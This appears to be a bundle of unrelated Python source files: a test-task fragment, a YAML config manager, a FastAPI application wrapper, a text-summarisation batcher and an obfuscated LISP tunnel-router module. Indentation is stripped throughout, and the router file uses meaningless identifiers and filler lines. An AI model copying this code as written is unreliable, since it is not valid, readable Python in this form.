if self.isIndexerQuery:
result = indexer_rest.polling_create_index_status(self.bucket, index=self.index_name,
timeout=self.timeout)
self.set_result(result)
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return
self.complete_task()
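# Usage sketch (added for illustration; not part of the original file). The
# Task subclasses in this module share the same lifecycle -- start_task(),
# do the work, set_result()/set_exception(), complete_task() -- and are
# normally driven through the framework's task manager, e.g.:
#
#   task = BucketFlushTask(server, task_manager, bucket="default")
#   task_manager.add_new_task(task)        # manager method names are assumptions
#   result = task_manager.get_task_result(task)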
|
config.py
|
import os
import traceback
from abc import abstractmethod, ABC
from pathlib import Path
from threading import Thread
from typing import Optional
import yaml
from bauh.api.constants import CONFIG_PATH
from bauh.commons import util
def read_config(file_path: str, template: dict, update_file: bool = False, update_async: bool = False) -> dict:
if not os.path.exists(file_path):
Path(CONFIG_PATH).mkdir(parents=True, exist_ok=True)
save_config(template, file_path)
else:
with open(file_path) as f:
local_config = yaml.safe_load(f.read())
if local_config:
util.deep_update(template, local_config)
if update_file:
if update_async:
Thread(target=save_config, args=(template, file_path), daemon=True).start()
else:
save_config(template, file_path)
return template
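# Example (added for illustration; the path and keys below are assumptions):
#   template = {'backend': {'enabled': True}, 'interval': 300}
#   cfg = read_config('/tmp/my_tool/config.yml', template, update_file=True)
#   # the first run writes the template to disk; later runs deep-merge the
#   # saved values into the template and return the merged dict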
def save_config(config: dict, file_path: str):
with open(file_path, 'w+') as f:
f.write(yaml.dump(config))
class ConfigManager(ABC):
@abstractmethod
def read_config(self) -> Optional[dict]:
pass
@abstractmethod
def get_default_config(self) -> dict:
pass
@abstractmethod
def is_config_cached(self) -> bool:
pass
def get_config(self) -> dict:
default_config = self.get_default_config()
if default_config:
cached_config = self.read_config()
if cached_config:
self.merge_config(default_config, cached_config)
return default_config
@staticmethod
def merge_config(base_config: dict, current_config: dict):
util.deep_update(base_config, current_config)
@abstractmethod
def save_config(self, config_obj: dict):
pass
class YAMLConfigManager(ConfigManager, ABC):
def __init__(self, config_file_path: str):
self.file_path = config_file_path
def is_config_cached(self) -> bool:
return os.path.exists(self.file_path)
def read_config(self) -> Optional[dict]:
if self.is_config_cached():
with open(self.file_path) as f:
local_config = yaml.safe_load(f.read())
if local_config is not None:
return local_config
def save_config(self, config_obj: dict):
if config_obj:
config_dir = os.path.dirname(self.file_path)
try:
Path(config_dir).mkdir(parents=True, exist_ok=True)
except OSError:
traceback.print_exc()
return
try:
with open(self.file_path, 'w+') as f:
f.write(yaml.dump(config_obj))
except:
traceback.print_exc()
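# Minimal usage sketch (added for illustration; not part of the original
# module). The subclass and file path below are assumptions; it shows how
# get_config() deep-merges the default template with whatever is cached.
if __name__ == '__main__':
    class _DemoConfigManager(YAMLConfigManager):
        def get_default_config(self) -> dict:
            return {'ui': {'theme': 'light', 'scale': 1.0}, 'updates': {'interval': 60}}

    manager = _DemoConfigManager('/tmp/demo_config.yml')
    manager.save_config({'ui': {'theme': 'dark'}})
    # prints the defaults with 'theme' overridden by the cached value
    print(manager.get_config())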
|
application.py
|
import gzip
from multiprocessing import Process
from typing import Callable
import typer
import uvicorn
from fastapi import FastAPI, Request, Response
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.routing import APIRoute
from fastapi_pagination import add_pagination
from starlette.middleware.cors import CORSMiddleware
from ._utils import singleton
from .middlewares import process_middleware
class GzipRequest(Request):
async def body(self) -> bytes:
if not hasattr(self, "_body"):
body = await super().body()
if "gzip" in self.headers.getlist("Content-Encoding"):
body = gzip.decompress(body)
self._body = body
return self._body
class GzipRoute(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
request = GzipRequest(request.scope, request.receive)
return await original_route_handler(request)
return custom_route_handler
@singleton
class Bali:
def __init__(self, base_settings=None, **kwargs):
self.base_settings = base_settings or {}
self.kwargs = kwargs
self._app = None
def __getattribute__(self, attr, *args, **kwargs):
try:
return super().__getattribute__(attr)
except AttributeError:
if not self._app:
# uvicorn entry is __call__
if attr == '__call__':
self.http()
return getattr(self._app, attr)
raise Exception('FastAPI App not initialized')
return getattr(self._app, attr)
async def __call__(self, *args, **kwargs):
self.http()
await self._app.__call__(*args, **kwargs)
def _launch_http(self):
self._app = FastAPI(**self.base_settings)
uvicorn.run("main:app", host="0.0.0.0", port=8000, reload=True, access_log=True)
def _launch_rpc(self):
service = self.kwargs.get('rpc_service')
if not service:
raise Exception('rpc_service not provided')
service.serve()
def _start_all(self):
process_http = Process(target=self._launch_http)
process_http.start()
process_rpc = Process(target=self._launch_rpc)
process_rpc.start()
process_rpc.join()
process_http.join()
def settings(self, **kwargs):
self.base_settings.update(kwargs)
def http(self):
"""load FastAPI to instance"""
self._app = FastAPI(**self.base_settings)
self._app.router.route_class = GzipRoute
# routers
for router in self.kwargs.get('routers', []):
self._app.include_router(**router)
# cors
backend_cors_origins = self.kwargs.get('backend_cors_origins')
if backend_cors_origins:
self._app.add_middleware(GZipMiddleware)
self._app.add_middleware(
CORSMiddleware,
allow_origins=[str(origin) for origin in backend_cors_origins],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
self._app.middleware('http')(process_middleware)
add_pagination(self._app)
def launch(self, http: bool = False, rpc: bool = False):
start_all = not any([http, rpc])
if start_all:
return self._start_all()
if http:
self._launch_http()
if start_all or rpc:
self._launch_rpc()
def start(self):
typer.run(self.launch)
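# Minimal usage sketch (added for illustration; not part of the original
# module). The settings and CORS origin are assumptions; with an empty routers
# list the app still serves FastAPI's default endpoints such as /docs.
if __name__ == '__main__':
    demo = Bali(
        base_settings={'title': 'demo'},
        routers=[],
        backend_cors_origins=['http://localhost:3000'],
    )
    demo.start()  # typer CLI: `python application.py --http` or `--rpc`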
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import queue as Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps.value:
article_words = article_words[:hps.max_enc_steps.value]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps.value, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen.value:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
            # Get a version of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps.value, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
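    # Worked example (added for clarity; not in the original source): with
    # sequence=[8, 9, 10], start_id=2, stop_id=3 and max_len=4 the result is
    #   inp    = [2, 8, 9, 10]
    #   target = [8, 9, 10, 3]
    # while max_len=3 truncates both to inp=[2, 8, 9], target=[8, 9, 10] and
    # no stop_id is appended.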
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen.value:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size.value), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen.value:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps.value, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size.value)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
example = Example(article, abstract_sentences, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
if self._hps.mode.value != 'decode':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.batch_size.value * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.batch_size.value):
batches.append(inputs[i:i + self._hps.batch_size.value])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # beam search decode mode
ex = self._example_queue.get()
                b = [ex for _ in range(self._hps.batch_size.value)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = next(example_generator) # e is a tf.Example
try:
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
tf.logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_text)
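# Usage sketch (added for illustration; not part of the original file). The
# hps object is assumed to expose flag-style fields with a `.value` attribute,
# as used throughout this module:
#
#   batcher = Batcher('data/train.bin', vocab, hps, single_pass=False)
#   batch = batcher.next_batch()    # blocks until the background threads
#                                   # have filled the batch queue
#   print(batch.enc_batch.shape)    # (batch_size, <=max_enc_steps)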
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import chr
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import time
import select
import threading
import os
import copy
from subprocess import getoutput
import binascii
try :
import pcappy
except :
pass
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import pcapy
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = [ None , None , None ]
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = lisp . lisp_get_ephemeral_port ( )
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
if 15 - 15: I1IiiI
O0ooo00OOo00 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global O0ooo00OOo00
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
O0ooo00OOo00 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global O0ooo00OOo00
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , O0ooo00OOo00 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in list ( kv_pair . keys ( ) ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OOO . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1OOO
if 59 - 59: II111iiii + OoooooooOO * OoOoOO00 + i1IIi
if ( O0o0 == "rloc-prefix" ) :
Oo0OoO00oOO0o = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Oo0OoO00oOO0o . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = Oo0OoO00oOO0o
if 80 - 80: oO0o + OOooOOo - OOooOOo % iII111i
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 63 - 63: I1IiiI - I1ii11iIi11i + O0 % I11i / iIii1I11I1II1 / o0oOOo0O0Ooo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
for o000O0o in lisp . lisp_glean_mappings :
if ( ( "eid-prefix" in o000O0o ) ^ ( "eid-prefix" in oO0Oo ) ) : continue
if ( ( "eid-prefix" in o000O0o ) and ( "eid-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "eid-prefix" ]
oO0OOoo0OO = oO0Oo [ "eid-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( ( "group-prefix" in o000O0o ) ^ ( "group-prefix" in oO0Oo ) ) : continue
if ( ( "group-prefix" in o000O0o ) and ( "group-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "group-prefix" ]
oO0OOoo0OO = oO0Oo [ "group-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 91 - 91: IiII
if 15 - 15: II111iiii
if ( ( "rloc-prefix" in o000O0o ) ^ ( "rloc-prefix" in oO0Oo ) ) : continue
if ( ( "rloc-prefix" in o000O0o ) and ( "rloc-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "rloc-prefix" ]
oO0OOoo0OO = oO0Oo [ "rloc-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if ( ( "instance-id" in o000O0o ) ^ ( "instance-id" in oO0Oo ) ) : continue
if ( ( "instance-id" in o000O0o ) and ( "instance-id" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "instance-id" ]
oO0OOoo0OO = oO0Oo [ "instance-id" ]
if ( iI1iII1 != oO0OOoo0OO ) : continue
